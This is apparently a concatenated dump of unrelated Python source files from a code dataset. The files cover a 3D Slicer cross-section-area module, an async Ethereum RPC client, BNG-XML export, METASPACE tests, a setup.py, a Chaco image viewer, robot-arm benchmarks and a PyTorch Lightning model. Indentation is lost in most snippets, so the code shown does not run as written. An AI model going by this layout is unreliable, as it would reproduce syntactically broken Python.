https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def setDefaultParameters(self, parameterNode):
"""
Initialize parameter node with default settings.
"""
if not parameterNode.GetParameter("Axis"):
parameterNode.SetParameter("Axis", "slice")
def run(self, segmentationNode, volumeNode, axis, tableNode, plotChartNode):
"""
Run the processing algorithm.
Can be used without GUI widget.
:param segmentationNode: cross section area will be computed on this
:param volumeNode: optional reference volume (to determine slice positions and directions)
:param axis: axis index to compute cross section areas along
:param tableNode: result table node
:param plotChartNode: result chart node
"""
import numpy as np
logging.info('Processing started')
if not segmentationNode:
raise ValueError("Segmentation node is invalid")
        # Get the list of visible segment IDs
visibleSegmentIds = vtk.vtkStringArray()
segmentationNode.GetDisplayNode().GetVisibleSegmentIDs(visibleSegmentIds)
if visibleSegmentIds.GetNumberOfValues() == 0:
raise ValueError("SliceAreaPlot will not return any results: there are no visible segments")
if axis=="row":
axisIndex = 0
elif axis=="column":
axisIndex = 1
elif axis=="slice":
axisIndex = 2
else:
raise ValueError("Invalid axis name: "+axis)
#
# Make a table and set the first column as the slice number. This is used
# as the X axis for plots.
#
tableNode.RemoveAllColumns()
table = tableNode.GetTable()
# Make a plot chart node. Plot series nodes will be added to this in the
# loop below that iterates over each segment.
plotChartNode.SetTitle('Segment cross-section area ('+axis+')')
plotChartNode.SetXAxisTitle(axis +" index")
plotChartNode.SetYAxisTitle('Area in mm^2') # TODO: use length unit
#
# For each segment, get the area and put it in the table in a new column.
#
try:
# Create temporary volume node
tempSegmentLabelmapVolumeNode = slicer.mrmlScene.AddNewNodeByClass('vtkMRMLLabelMapVolumeNode', "SegmentCrossSectionAreaTemp")
for segmentIndex in range(visibleSegmentIds.GetNumberOfValues()):
segmentID = visibleSegmentIds.GetValue(segmentIndex)
segmentList = vtk.vtkStringArray()
segmentList.InsertNextValue(segmentID)
if not slicer.modules.segmentations.logic().ExportSegmentsToLabelmapNode(segmentationNode, segmentList, tempSegmentLabelmapVolumeNode, volumeNode):
continue
if segmentIndex == 0:
volumeExtents = tempSegmentLabelmapVolumeNode.GetImageData().GetExtent()
numSlices = volumeExtents[axisIndex*2+1] - volumeExtents[axisIndex*2] + 1
startPosition_Ijk = [
(volumeExtents[0]+volumeExtents[1])/2.0 if axisIndex!=0 else volumeExtents[0],
(volumeExtents[2]+volumeExtents[3])/2.0 if axisIndex!=1 else volumeExtents[2],
(volumeExtents[4]+volumeExtents[5])/2.0 if axisIndex!=2 else volumeExtents[4],
1
]
endPosition_Ijk = [
(volumeExtents[0]+volumeExtents[1])/2.0 if axisIndex!=0 else volumeExtents[1],
(volumeExtents[2]+volumeExtents[3])/2.0 if axisIndex!=1 else volumeExtents[3],
(volumeExtents[4]+volumeExtents[5])/2.0 if axisIndex!=2 else volumeExtents[5],
1
]
# Get physical coordinates from voxel coordinates
volumeIjkToRas = vtk.vtkMatrix4x4()
tempSegmentLabelmapVolumeNode.GetIJKToRASMatrix(volumeIjkToRas)
startPosition_Ras = np.array([0.0,0.0,0.0,1.0])
volumeIjkToRas.MultiplyPoint(startPosition_Ijk, startPosition_Ras)
endPosition_Ras = np.array([0.0,0.0,0.0,1.0])
volumeIjkToRas.MultiplyPoint(endPosition_Ijk, endPosition_Ras)
volumePositionIncrement_Ras = np.array([0,0,0,1])
if numSlices > 1:
volumePositionIncrement_Ras = (endPosition_Ras - startPosition_Ras) / (numSlices - 1.0)
# If volume node is transformed, apply that transform to get volume's RAS coordinates
transformVolumeRasToRas = vtk.vtkGeneralTransform()
slicer.vtkMRMLTransformNode.GetTransformBetweenNodes(tempSegmentLabelmapVolumeNode.GetParentTransformNode(), None, transformVolumeRasToRas)
sliceNumberArray = vtk.vtkIntArray()
sliceNumberArray.SetName("Index")
slicePositionArray = vtk.vtkFloatArray()
slicePositionArray.SetNumberOfComponents(3)
slicePositionArray.SetComponentName(0, "R")
slicePositionArray.SetComponentName(1, "A")
slicePositionArray.SetComponentName(2, "S")
slicePositionArray.SetName("Position")
for i in range(numSlices):
sliceNumberArray.InsertNextValue(i)
point_VolumeRas = startPosition_Ras + i * volumePositionIncrement_Ras
point_Ras = transformVolumeRasToRas.TransformPoint(point_VolumeRas[0:3])
slicePositionArray.InsertNextTuple3(*point_Ras)
table.AddColumn(sliceNumberArray)
tableNode.SetColumnDescription(sliceNumberArray.GetName(), "Index of " + axis)
tableNode.SetColumnUnitLabel(sliceNumberArray.GetName(), "voxel")
table.AddColumn(slicePositionArray)
tableNode.SetColumnDescription(slicePositionArray.GetName(), "RAS position of slice center")
tableNode.SetColumnUnitLabel(slicePositionArray.GetName(), "mm") # TODO: use length unit
narray = slicer.util.arrayFromVolume(tempSegmentLabelmapVolumeNode)
areaArray = vtk.vtkFloatArray()
segmentName = segmentationNode.GetSegmentation().GetSegment(segmentID).GetName()
areaArray.SetName(segmentName)
# Convert number of voxels to area in mm2
spacing = tempSegmentLabelmapVolumeNode.GetSpacing()
areaOfPixelMm2 = spacing[0] * spacing[1] * spacing[2] / spacing[axisIndex]
# Count number of >0 voxels for each slice
for i in range(numSlices):
if axisIndex == 0:
areaBySliceInVoxels = np.count_nonzero(narray[:,:,i])
elif axisIndex == 1:
areaBySliceInVoxels = np.count_nonzero(narray[:, i, :])
elif axisIndex == 2:
areaBySliceInVoxels = np.count_nonzero(narray[i, :, :])
areaBySliceInMm2 = areaBySliceInVoxels * areaOfPixelMm2
areaArray.InsertNextValue(areaBySliceInMm2)
tableNode.AddColumn(areaArray)
tableNode.SetColumnUnitLabel(areaArray.GetName(), "mm2") # TODO: use length unit
tableNode.SetColumnDescription(areaArray.GetName(), "Cross-section area")
# Make a plot series node for this column.
plotSeriesNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLPlotSeriesNode", segmentName)
plotSeriesNode.SetAndObserveTableNodeID(tableNode.GetID())
plotSeriesNode.SetXColumnName("Index")
plotSeriesNode.SetYColumnName(segmentName)
plotSeriesNode.SetUniqueColor()
# Add this series to the plot chart node created above.
plotChartNode.AddAndObservePlotSeriesNodeID(plotSeriesNode.GetID())
finally:
# Remove temporary volume node
colorNode = tempSegmentLabelmapVolumeNode.GetDisplayNode().GetColorNode()
if colorNode:
slicer.mrmlScene.RemoveNode(colorNode)
slicer.mrmlScene.RemoveNode(tempSegmentLabelmapVolumeNode)
logging.info('Processing completed')
def showChart(self, plotChartNode):
# Choose a layout where plots are visible
layoutManager = slicer.app.layoutManager()
layoutWithPlot = slicer.modules.plots.logic().GetLayoutWithPlot(layoutManager.layout)
layoutManager.setLayout(layoutWithPlot)
# Select chart in plot view
plotWidget = layoutManager.plotWidget(0)
plotViewNode = plotWidget.mrmlPlotViewNode()
plotViewNode.SetPlotChartNodeID(plotChartNode.GetID())
    def showTable(self, tableNode):
        # Choose a layout where tables are visible
        layoutManager = slicer.app.layoutManager()
        layoutWithTable = slicer.modules.tables.logic().GetLayoutWithTable(layoutManager.layout)
        layoutManager.setLayout(layoutWithTable)
        # Select the table in the table view
        tableWidget = layoutManager.tableWidget(0)
        tableWidget.tableView().setMRMLTableNode(tableNode)
#
# SegmentCrossSectionAreaTest
#
class SegmentCrossSectionAreaTest(ScriptedLoadableModuleTest):
"""
This is the test case for your scripted module.
Uses ScriptedLoadableModuleTest base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def setUp(self):
""" Do whatever is needed to reset the state - typically a scene clear will be enough.
"""
slicer.mrmlScene.Clear(0)
def runTest(self):
"""Run as few or as many tests as needed here.
"""
self.setUp()
self.test_SegmentCrossSectionArea1()
def test_SegmentCrossSectionArea1(self):
""" Ideally you should have several levels of tests. At the lowest level
tests should exercise the functionality of the logic with different inputs
(both valid and invalid). At higher levels your tests should emulate the
way the user would interact with your code and confirm that it still works
the way you intended.
One of the most important features of the tests is that it should alert other
developers when their changes will have an impact on the behavior of your
module. For example, if a developer removes a feature that you depend on,
your test should break so they know that the feature is needed.
"""
self.delayDisplay("Starting the test")
# Load master volume
import SampleData
sampleDataLogic = SampleData.SampleDataLogic()
masterVolumeNode = sampleDataLogic.downloadMRBrainTumor1()
# Create segmentation
segmentationNode = slicer.vtkMRMLSegmentationNode()
slicer.mrmlScene.AddNode(segmentationNode)
segmentationNode.CreateDefaultDisplayNodes() # only needed for display
segmentationNode.SetReferenceImageGeometryParameterFromVolumeNode(masterVolumeNode)
# Create a sphere shaped segment
radius = 20
tumorSeed = vtk.vtkSphereSource()
tumorSeed.SetCenter(-6, 30, 28)
tumorSeed.SetRadius(radius)
tumorSeed.SetPhiResolution(120)
tumorSeed.SetThetaResolution(120)
tumorSeed.Update()
segmentId = segmentationNode.AddSegmentFromClosedSurfaceRepresentation(tumorSeed.GetOutput(), "Tumor",
[1.0, 0.0, 0.0])
tableNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLTableNode", "Segment cross-section area table")
plotChartNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLPlotChartNode", "Segment cross-section area plot")
logic = SegmentCrossSectionAreaLogic()
logic.run(segmentationNode, masterVolumeNode, "slice", tableNode, plotChartNode)
logic.showChart(plotChartNode)
        self.assertEqual(tableNode.GetNumberOfColumns(), 3)
# Compute error
crossSectionAreas = slicer.util.arrayFromTableColumn(tableNode, "Tumor")
largestCrossSectionArea = crossSectionAreas.max()
import math
expectedlargestCrossSectionArea = radius*radius*math.pi
logging.info("Largest cross-section area: {0:.2f}".format(largestCrossSectionArea))
logging.info("Expected largest cross-section area: {0:.2f}".format(expectedlargestCrossSectionArea))
        errorPercent = 100.0 * abs(largestCrossSectionArea - expectedlargestCrossSectionArea) / expectedlargestCrossSectionArea
logging.info("Largest cross-section area error: {0:.2f}%".format(errorPercent))
# Error between expected and actual cross section is due to finite resolution of the segmentation.
# It should not be more than a few percent. The actual error in this case is around 1%, but use 2% to account for
# numerical differences between different platforms.
self.assertTrue(errorPercent < 2.0)
self.delayDisplay('Test passed')
|
156769
|
import asyncio
import itertools
from typing import Dict, Any, Union, List
import logging
import json
from web3 import Web3
from .subscription import Subscription
from .methods import RPCMethod
from .contract import DeployedContract
from .types import Wei, Address
from .transport import BaseTransport
def _format_block_identifier(block_identifier: Union[int, str, bytes]):
if block_identifier is None:
return 'latest'
elif isinstance(block_identifier, int):
return hex(block_identifier)
else:
return block_identifier
class AsyncWeb3:
logger = logging.getLogger("async_web3.AsyncWeb3")
    def __init__(self, transport: BaseTransport):
        self._transport = transport
        self.rpc_counter = itertools.count(1)
        self._requests: Dict[int, asyncio.Future] = {}
        self._subscriptions: Dict[str, asyncio.Queue] = {}
    async def connect(self, *args, **kwargs):
        await self._transport.connect(*args, **kwargs)
        asyncio.get_event_loop().create_task(self._process())
async def is_connect(self):
try:
await self.client_version
except Exception:
return False
return True
@property
async def client_version(self) -> str:
return await self._do_request(RPCMethod.web3_clientVersion)
@property
async def accounts(self):
return await self._do_request(RPCMethod.eth_accounts)
@property
async def block_number(self) -> int:
hex_block = await self._do_request(RPCMethod.eth_blockNumber)
return int(hex_block, 16)
@property
async def gas_price(self) -> Wei:
return Wei(await self._do_request(RPCMethod.eth_gasPrice))
async def get_balance(self, address: Address) -> Wei:
assert isinstance(address, Address)
return Wei(await self._do_request(RPCMethod.eth_getBalance, [address]))
async def get_transaction_count(self, address: Address, block_identifier: Union[int, str, bytes] = None) -> Wei:
block_identifier = _format_block_identifier(block_identifier)
return Wei(await self._do_request(RPCMethod.eth_getTransactionCount, [address, block_identifier]))
async def get_storage_at(
self, address: Address, storage_position: Union[int, str], block: Any
) -> str:
if isinstance(block, str) and block in ["latest", "earliest", "pending"]:
block_param = block
else:
block_param = Web3.toHex(block)
return await self._do_request(
RPCMethod.eth_getStorageAt,
[address, Web3.toHex(storage_position), block_param],
)
async def get_block_by_hash(self, hash_hex: str, with_details: bool = False):
return await self._do_request(
RPCMethod.eth_getBlockByHash, [hash_hex, with_details]
)
async def get_block_by_number(self, block_number: int, with_details: bool = False):
return await self._do_request(
RPCMethod.eth_getBlockByNumber, [Web3.toHex(block_number), with_details]
)
async def call(self, call_transaction: Dict, block_identifier: Union[int, str, bytes] = None):
block_identifier = _format_block_identifier(block_identifier)
return await self._do_request(RPCMethod.eth_call, [call_transaction, block_identifier])
async def send_raw_transaction(self, txdata):
return await self._do_request(RPCMethod.eth_sendRawTransaction, [txdata])
async def get_transaction_receipt(self, txhash):
return await self._do_request(RPCMethod.eth_getTransactionReceipt, [txhash])
async def get_transaction(self, txhash):
return await self._do_request(RPCMethod.eth_getTransactionByHash, [txhash])
async def get_raw_transaction(self, txhash):
return await self._do_request(RPCMethod.eth_getRawTransactionByHash, [txhash])
async def subscribe_block(self) -> Subscription:
return await self._do_subscribe("newHeads")
async def subscribe_syncing(self) -> Subscription:
return await self._do_subscribe("syncing")
async def subscribe_logs(self, **options) -> Subscription:
return await self._do_subscribe("logs", options)
async def subscribe_new_pending_transaction(self) -> Subscription:
return await self._do_subscribe("newPendingTransactions")
async def unsubscribe(self, subscription: Subscription):
assert isinstance(subscription, Subscription)
response = await self._do_request(RPCMethod.eth_unsubscribe, [subscription.id])
assert response
queue = self._subscriptions[subscription.id]
del self._subscriptions[subscription.id]
queue.task_done()
def contract(self, address: Address, abi: List) -> DeployedContract:
assert isinstance(address, Address)
return DeployedContract(self, address, abi)
async def _do_subscribe(self, *args):
subscription_id = await self._do_request(RPCMethod.eth_subscribe, args)
queue = asyncio.Queue()
self._subscriptions[subscription_id] = queue
return Subscription(subscription_id, queue)
async def _do_request(self, method, params: Any = None):
request_id = next(self.rpc_counter)
rpc_dict = {
"jsonrpc": "2.0",
"method": method,
"params": params or [],
"id": request_id,
}
encoded = json.dumps(rpc_dict).encode("utf-8")
fut = asyncio.get_event_loop().create_future()
self._requests[request_id] = fut
        await self._transport.send(encoded)
self.logger.debug(f"outbound: {encoded}")
result = await fut
del self._requests[request_id]
return result
async def _process(self):
while True:
            msg = await self._transport.receive()
if msg is None:
break
self.logger.debug(f"inbound: {msg}")
j = json.loads(msg)
if "method" in j and j["method"] == "eth_subscription":
params = j["params"]
subscription_id = params["subscription"]
if subscription_id in self._subscriptions:
# TODO: maybe wrap this as block info?
self._subscriptions[subscription_id].put_nowait(params["result"])
if "id" in j:
request_id = j["id"]
if request_id in self._requests:
self._requests[request_id].set_result(j["result"])
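# Hypothetical usage sketch (any concrete BaseTransport from .transport will do;
# the coroutine below is illustrative only):
#
#   async def main(transport: BaseTransport):
#       w3 = AsyncWeb3(transport)
#       await w3.connect()
#       print(await w3.client_version)
#       print(await w3.block_number)
#       sub = await w3.subscribe_block()
#       # consume new block headers from the subscription, then:
#       await w3.unsubscribe(sub)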
|
156787
|
from lxml import etree
def create_property_node(parentNode, key, value):
if value.startswith('"'):
propertyNode = etree.SubElement(parentNode, "Property", id=key, value=value.strip('"'), type="str")
else:
propertyNode = etree.SubElement(parentNode, "Property", id=key, value=value, type="num")
return propertyNode
def write2bngxmle(properties_dict, model_name):
'''
creates a bng-xml v1.1 spec from model properties
'''
root = etree.Element("bngexperimental", version="1.1", name=model_name)
if len(properties_dict['modelProperties']) > 0:
listOfModelProperties = etree.SubElement(root, "ListOfProperties")
for element in properties_dict['modelProperties']:
create_property_node(listOfModelProperties, element.strip().lower(), properties_dict['modelProperties'][element].strip())
listOfCompartments = etree.SubElement(root, "ListOfCompartments")
for element in properties_dict['compartmentProperties']:
compartmentNode = etree.SubElement(listOfCompartments, "Compartment", id=element)
listOfCompartmentProperties = etree.SubElement(compartmentNode, "ListOfProperties")
for propertyEntry in properties_dict['compartmentProperties'][element]:
create_property_node(listOfCompartmentProperties, propertyEntry[0].strip().lower(), propertyEntry[1].strip())
listOfMoleculeTypes = etree.SubElement(root, "ListOfMoleculeTypes")
for element in properties_dict['moleculeProperties']:
moleculeNode = etree.SubElement(listOfMoleculeTypes, "MoleculeType", id=element)
listOfMoleculeProperties = etree.SubElement(moleculeNode, "ListOfProperties")
for propertyEntry in properties_dict['moleculeProperties'][element]:
propertyNode = create_property_node(listOfMoleculeProperties, propertyEntry[0].strip().lower(), propertyEntry[1]['name'].strip())
if len(propertyEntry[1]['parameters']) > 0:
sublistOfMoleculeProperties = etree.SubElement(propertyNode, "ListOfProperties")
for parameter in propertyEntry[1]['parameters']:
etree.SubElement(sublistOfMoleculeProperties, "Property", id=parameter[0], value=parameter[1])
return etree.tostring(root, pretty_print=True)
def merge_bxbxe(base_bngxml, extended_bngxml):
'''
temporary method to concatenate a bng-xml 1.0 and bng-xml 1.1 definition
'''
basedoc = etree.parse(base_bngxml).getroot()
edoc = etree.parse(extended_bngxml).getroot()
basedoc.append(edoc)
return etree.tostring(basedoc, encoding='unicode', pretty_print=True)
|
156794
|
import pytest
from metaspace.tests.utils import sm
def test_get_all_projects(sm):
projects = sm.projects.get_all_projects()
assert len(projects) > 0
def test_get_my_projects(sm):
projects = sm.projects.get_my_projects()
assert len(projects) > 0
assert all(p['currentUserRole'] for p in projects)
def test_get_project(sm):
project_id = sm.projects.get_all_projects()[0]['id'] # assuming this works
project = sm.projects.get_project(project_id)
assert project['id'] == project_id
assert project['name']
def test_add_project_external_link(sm):
# find a project that the current user manages
my_projects = sm.projects.get_my_projects()
project_id = [p['id'] for p in my_projects if p['currentUserRole'] == 'MANAGER'][0]
provider = 'MetaboLights'
link = 'https://www.ebi.ac.uk/metabolights/MTBLS313'
result = sm.projects.add_project_external_link(project_id, provider, link)
assert any(ext_link == {'provider': provider, 'link': link} for ext_link in result)
def test_remove_project_external_link(sm):
# find a project that the current user manages
my_projects = sm.projects.get_my_projects()
project_id = [p['id'] for p in my_projects if p['currentUserRole'] == 'MANAGER'][0]
provider = 'MetaboLights'
link = 'https://www.ebi.ac.uk/metabolights/MTBLS313'
result = sm.projects.remove_project_external_link(project_id, provider, link)
assert not any(ext_link == {'provider': provider, 'link': link} for ext_link in result)
|
156795
|
from pymusicdl.modules.common import common
from pymusicdl.modules.spotify_downloader import spotify_downloader
from pymusicdl.modules.ytDownloader import yt_downloader
from pymusicdl.modules.picker import *
|
156823
|
from pathlib import Path
import re
# ref: https://extendsclass.com/regex/e6adb72
empty_classdef = (
r"(?P<indent1> ?)class\s*(?P<class>\s*.+\s*):(?P<LF>\r?\n)(?P<indent2> +)''\r?\n"
)
re_classdef = re.compile(empty_classdef, flags=re.MULTILINE)
repl_classdef = r"\g<indent1>class \g<class>:\g<LF>\g<indent2>def __init__(self):\g<LF>\g<indent2> ''\g<LF>\g<indent2> pass\g<LF>\g<LF>"
def add_init_methods(filename) -> int:
"""Add (missing) __init__ methods to a class using a regex
this assumes the (incorrect) classdef format that has been used by stubbers prior to version 1.4.0
and updates that to add the init.
"""
found = 0
    with open(filename, mode="r+") as file:
content = file.read()
found = len(re_classdef.findall(content))
content = re_classdef.sub(repl_classdef, content)
# print(content)
file.seek(0)
file.write(content)
return found
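# Illustrative transformation (hypothetical stub): a classdef of the form
#
#   class Foo:
#       ''
#
# is rewritten so the empty docstring lands inside a generated __init__:
#
#   class Foo:
#       def __init__(self):
#           ''
#           pass
#
# (exact body indentation follows the captured <indent2> group)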
print("Add missing __init__ methods to stub classes")
for stubfile in Path("./micropython-stubs/stubs").glob(r"**/*.py"):
    print(stubfile, end=", ")
x = add_init_methods(stubfile)
print(x)
for stubfile in Path("all_stubs").glob(r"**/*.py"):
print(stubfile)
|
156827
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
try:
from pypandoc import convert
read_md = lambda f: convert(f, 'rst')
except ImportError:
print("warning: pypandoc module not found,"
"could not convert markdown README to RST")
read_md = lambda f: open(f, 'r').read()
config = {
'name': 'colour-valgrind',
'version': '0.3.9',
'description': 'Wraps Valgrind to colour the output.',
'long_description': read_md('README.md'),
'author': 'StarlitGhost',
'url': 'http://github.com/StarlitGhost/colour-valgrind',
'author_email': '<EMAIL>',
'classifiers': [
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Debuggers',
'Topic :: Text Processing :: Filters',
'Topic :: Utilities',
],
'keywords': 'valgrind color colour filter',
'license': 'MIT',
'packages': ['colourvalgrind'],
'install_requires': [
'colorama',
'regex',
'six',
],
'entry_points': {
'console_scripts': ['colour-valgrind=colourvalgrind.command_line:main'],
},
'include_package_data': True,
}
setup(**config)
|
156838
|
import numpy as N
from traits.api import (HasTraits, Array, Range, Instance, Enum)
from traitsui.api import View, Item
from chaco.api import (ArrayPlotData, Plot, PlotLabel, ColorMapper, gray, pink,
jet)
from chaco.default_colormaps import fix
from enable.api import ComponentEditor
from AwesomeColorMaps import awesome, isoluminant
def bone(rng, **traits):
    """
    Generator function for the 'bone' colormap (instead of the faulty one in
    Chaco). Data from Matplotlib.
    """
_bone_data = {
'red': ((0., 0., 0.), (0.746032, 0.652778, 0.652778), (1.0, 1.0, 1.0)),
'green': ((0., 0., 0.), (0.365079, 0.319444, 0.319444),
(0.746032, 0.777778, 0.777778), (1.0, 1.0, 1.0)),
'blue': ((0., 0., 0.), (0.365079, 0.444444, 0.444444), (1.0, 1.0, 1.0))}
return ColorMapper.from_segment_map(_bone_data, range=rng, **traits)
class CameraImage(HasTraits):
data = Array()
data_store = Instance(ArrayPlotData)
plot = Instance(Plot)
hud_overlay = Instance(PlotLabel)
# Number of steps of 90 degrees to rotate the image before
# displaying it - must be between 0 and 3
rotate = Range(0, 3)
# Colormap to use for display; None means use the image's natural
# colors (if RGB data) or grayscale (if monochrome). Setting @cmap
# to a value coerces the image to monochrome.
cmap = Enum(None, gray, bone, pink, jet, isoluminant, awesome)
view = View(Item('plot', show_label=False, editor=ComponentEditor()))
def __init__(self, **traits):
super(CameraImage, self).__init__(**traits)
self._dims = (200, 320)
self.data_store = ArrayPlotData(image=self.data)
self._hud = dict()
self.plot = Plot(self.data_store)
# Draw the image
renderers = self.plot.img_plot('image', name='camera_image',
colormap=fix(gray, (0, 255)))
self._image = renderers[0]
self.plot.aspect_ratio = float(self._dims[1]) / self._dims[0]
self.hud_overlay = PlotLabel(text='', component=self.plot,
hjustify='left', overlay_position='inside bottom',
color='white')
self.plot.overlays.append(self.hud_overlay)
def _data_default(self):
return N.zeros(self._dims, dtype=N.uint8)
def _data_changed(self, value):
bw = (len(value.shape) == 2)
if not bw and self.cmap is not None:
# Selecting a colormap coerces the image to monochrome
# Use standard NTSC conversion formula
value = N.array(
0.2989 * value[..., 0]
+ 0.5870 * value[..., 1]
+ 0.1140 * value[..., 2])
value = N.rot90(value, self.rotate)
self.data_store['image'] = self.data = value
if self._dims != self.data.shape:
# Redraw the axes if the image is a different size
self.plot.delplot('camera_image')
self._dims = self.data.shape
renderers = self.plot.img_plot('image', name='camera_image',
colormap=self._get_cmap_function())
# colormap is ignored if image is RGB or RGBA
self._image = renderers[0]
# Make sure the aspect ratio is correct, even after resize
self.plot.aspect_ratio = float(self._dims[1]) / self._dims[0]
def _get_cmap_function(self):
return fix(
gray if self.cmap is None else self.cmap,
(0, 65535 if self.data.dtype == N.uint16 else 255))
def _cmap_changed(self, old_value, value):
# Must redraw the plot if data was RGB
if old_value is None or value is None:
self._data_changed(self.data)
cmap_func = self._get_cmap_function()
self._image.color_mapper = cmap_func(self._image.value_range)
def hud(self, key, text):
if text is None:
self._hud.pop(key, None)
else:
self._hud[key] = text
# Do the heads-up display
text = ''
for key in sorted(self._hud.keys()):
text += self._hud[key] + '\n\n'
self.hud_overlay.text = text
|
156876
|
import os
from experiments.experiments import ModelSelectionExperiment
from nilmlab.lab import TimeSeriesLength
dirname = os.path.dirname(__file__)
single_building_exp_checkpoint = os.path.join(dirname, '../results/cv1h.csv')
exp = ModelSelectionExperiment(cv=5)
exp.set_ts_len(TimeSeriesLength.WINDOW_1_HOUR)
exp.set_checkpoint_file(single_building_exp_checkpoint)
exp.run()
|
156897
|
from abc import abstractmethod
from numpy import eye, shape
from numpy.linalg import pinv
class Kernel(object):
def __init__(self):
pass
@abstractmethod
def kernel(self, X, Y=None):
raise NotImplementedError()
@staticmethod
def centering_matrix(n):
"""
Returns the centering matrix eye(n) - 1.0 / n
"""
return eye(n) - 1.0 / n
@staticmethod
def center_kernel_matrix(K):
"""
Centers the kernel matrix via a centering matrix H=I-1/n and returns HKH
"""
n = shape(K)[0]
H = eye(n) - 1.0 / n
return H.dot(K.dot(H))
    @staticmethod
    def center_kernel_matrix_regression(K, Kz, epsilon):
        r"""
        Centers the kernel matrix via a centering matrix
        R = I - K_z (K_z + \epsilon I)^{-1} = \epsilon (K_z + \epsilon I)^{-1}
        and returns RKR
        """
        n = shape(K)[0]
        Rz = epsilon * pinv(Kz + epsilon * eye(n))
        return Rz.dot(K.dot(Rz))
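
# --- Hedged usage sketch (not part of the original module) ---
# A quick numeric check, assuming only numpy: centering with H = I - 1/n
# removes the mean structure, so H K H must equal center_kernel_matrix(K).
if __name__ == '__main__':
    import numpy as np
    rng = np.random.default_rng(0)
    X = rng.normal(size=(5, 3))
    K = X.dot(X.T)
    H = Kernel.centering_matrix(5)
    assert np.allclose(H.dot(K).dot(H), Kernel.center_kernel_matrix(K))
    print('centering check passed')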
|
156971
|
import ray
from environment.rrt import RRTWrapper
from environment import utils
from environment import RealTimeEnv
from utils import (
parse_args,
load_config,
create_policies,
exit_handler
)
from environment import TaskLoader
import pickle
from signal import signal, SIGINT
from numpy import mean
from distribute import Pool
from os.path import exists
from tqdm import tqdm
if __name__ == "__main__":
args = parse_args()
args.gui = True
config = load_config(args.config)
env_conf = config['environment']
training_conf = config['training']
env_conf['min_ur5s_count'] = 1
env_conf['max_ur5s_count'] = 10
env_conf['task']['type'] = 'dynamic'
ray.init()
signal(SIGINT, lambda sig, frame: exit())
output_path = 'rrt_dynamic_benchmark_score.pkl'
if args.load:
output_path = 'policy_dynamic_benchmark_score.pkl'
benchmark_results = []
continue_benchmark = False
if exists(output_path):
# continue benchmark
benchmark_results = pickle.load(open(output_path, 'rb'))
continue_benchmark = True
finished_task_paths = [r['task']['task_path']
for r in benchmark_results]
task_loader = TaskLoader(
root_dir=args.tasks_path,
shuffle=True,
repeat=False)
training_conf['task_loader'] = task_loader
# set up policy if loaded
if args.load:
obs_dim = utils.get_observation_dimensions(
training_conf['observations'])
action_dim = 6
policy_manager = create_policies(
args=args,
training_config=config['training'],
action_dim=action_dim,
actor_obs_dim=obs_dim,
critic_obs_dim=obs_dim,
training=args.mode == 'train',
logger=None,
device='cpu')
policy = policy_manager.get_inference_nodes()[
'multiarm_motion_planner']
policy.policy.to('cpu')
training_conf['policy'] = policy
env = RealTimeEnv(
env_config=env_conf,
training_config=training_conf,
gui=args.gui,
logger=None)
env.set_memory_cluster_map(policy_manager.memory_map)
else:
RealTimeEnv = ray.remote(RealTimeEnv)
envs = [RealTimeEnv.remote(
env_config=env_conf,
training_config=training_conf,
gui=args.gui,
logger=None)
for _ in range(args.num_processes)]
env_pool = Pool(envs)
def callback(result):
benchmark_results.append(result)
if len(benchmark_results) % 100 == 0\
and len(benchmark_results) > 0:
print('Saving benchmark scores to ',
output_path)
with open(output_path, 'wb') as f:
pickle.dump(benchmark_results, f)
def pbar_update(pbar):
pbar.set_description(
'Average Success Rate : {:.04f}'.format(
mean([r['success_rate']
for r in benchmark_results])))
tasks = [t for t in task_loader
if not continue_benchmark
or t.task_path not in finished_task_paths]
if args.load:
with tqdm(tasks, dynamic_ncols=True, smoothing=0.01) as pbar:
for task in pbar:
callback(env.solve_task(task))
pbar_update(pbar)
else:
benchmark_results = env_pool.map(
exec_fn=lambda env, task: env.solve_task.remote(task),
iterable=tasks,
pbar_update=pbar_update,
callback_fn=callback
)
|
157113
|
# p is the alt_bn128 (BN254) base-field prime used e.g. by zk-SNARK circuits;
# it is a 254-bit number, so 2**253 < p < 2**254.
p = 21888242871839275222246405745257275088696311157297823662689037894645226208583
print("over 253 bit")
for i in range(10):
    # (p * i) >> 253 grows roughly like 1.5 * i, since p is about 1.5 * 2**253
    print(i, (p * i) >> 253)

def maxarg(x):
    # how many whole multiples of p fit into x
    return x // p

print("maxarg")
for i in range(16):
    print(i, maxarg(i << 253))

x = 0x2c130429c1d4802eb8703197d038ebd5109f96aee333bd027963094f5bb33ad
y = x * 9
print(hex(y))
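
# --- Hedged worked check (not part of the original snippet) ---
# Verifying the claims above with plain integer arithmetic.
assert p.bit_length() == 254   # so 2**253 < p < 2**254
assert (p * 1) >> 253 == 1     # p itself is just "over 253 bit"
assert maxarg(2 * p) == 2      # two whole multiples of p fit into 2*p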
|
157118
|
import hashlib
import json
import os
from argparse import ArgumentParser, Namespace
from collections import defaultdict
from copy import deepcopy
from functools import partial
from typing import Dict, List, Optional, Type
import numpy as np
import pytorch_lightning as pl
import torch
import torch.nn as nn
import torch.nn.functional as F
import transformers
from torch import Tensor
from torch.utils.data import ConcatDataset, DataLoader, RandomSampler
from transformers import AutoConfig, AutoModel, AutoTokenizer
import constant
import util
from dataset.base import Dataset
from enumeration import Schedule, Split, Task
from metric import Metric
from model.module import Identity, InputVariationalDropout, MeanPooling, Transformer
class Model(pl.LightningModule):
def __init__(self, hparams):
super(Model, self).__init__()
self.optimizer = None
self.scheduler = None
self._metric: Optional[Metric] = None
self.metrics: Dict[str, Metric] = dict()
        self.trn_datasets: Optional[List[Dataset]] = None
        self.val_datasets: Optional[List[Dataset]] = None
        self.tst_datasets: Optional[List[Dataset]] = None
self.padding: Dict[str, int] = {}
self.base_dir: str = ""
self._batch_per_epoch: int = -1
        self._comparison: Optional[str] = None
self._selection_criterion: Optional[str] = None
if isinstance(hparams, dict):
hparams = Namespace(**hparams)
# self.hparams: Namespace = hparams
self.save_hyperparameters(hparams)
pl.seed_everything(hparams.seed)
